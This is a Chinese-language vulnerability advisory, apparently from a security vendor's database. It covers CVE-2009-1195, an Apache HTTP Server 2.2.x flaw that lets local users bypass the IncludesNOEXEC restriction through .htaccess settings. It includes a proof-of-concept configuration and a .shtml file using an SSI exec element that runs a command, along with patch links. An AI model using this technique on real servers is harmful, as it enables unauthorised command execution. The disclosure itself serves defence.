安全研究

安全漏洞
Apache HTTP Server AllowOverride选项绕过安全限制漏洞

发布日期:2009-04-23
更新日期:2009-06-19

受影响系统:
Apache Group Apache 2.2.x
不受影响系统:
Apache Group Apache 2.2.11
描述:
BUGTRAQ  ID: 35115
CVE(CAN) ID: CVE-2009-1195

Apache HTTP Server是一款流行的Web服务器。

Apache HTTP Server没有正确地处理AllowOverride指令中的Options=IncludesNOEXEC选项,本地用户可以通过在.htaccess文件中配置(1) Options Includes、(2) Options +Includes或(3) Options +IncludesNOEXEC并在.shtml文件中注入exec元素导致绕过安全限制获得权限。

<*来源:Jonathan Peatfield
  
  链接:http://secunia.com/advisories/35261
        http://marc.info/?l=apache-httpd-dev&m=124048996106302&w=2
        https://issues.apache.org/bugzilla/show_bug.cgi?format=multiple&id=44262
        https://bugzilla.redhat.com/show_bug.cgi?format=multiple&id=489436
        https://www.redhat.com/support/errata/RHSA-2009-1075.html
        https://www.redhat.com/support/errata/RHSA-2009-1156.html
        https://www.redhat.com/support/errata/RHSA-2009-1155.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

向httpd.conf中添加:

<Directory "/var/www/html/test">
Options None
AllowOverride Options=IncludesNoEXEC
</Directory

在/var/www/html/test中创建以下两个文件:

index.shtml:
<html>
<body>
<p>
This document last modified <!--#flastmod file="front.shtml" -->
</p>
<p>Start include:</p>
<!--#include virtual="/test/test.shtml" -->
<p>End include</p>
</body></html>

test.shtml:
<html>
<body>
<p>start</p>
<pre>
<!--#exec cmd="pwd" -->
</pre>
<p>end</p>
</body>
</html>

建议:
厂商补丁:

Apache Group
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://svn.apache.org/viewvc?view=rev&revision=652885

RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2009:1155-01)以及相应补丁:
RHSA-2009:1155-01:Important: httpd security update
链接:https://www.redhat.com/support/errata/RHSA-2009-1155.html

浏览次数:4123
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障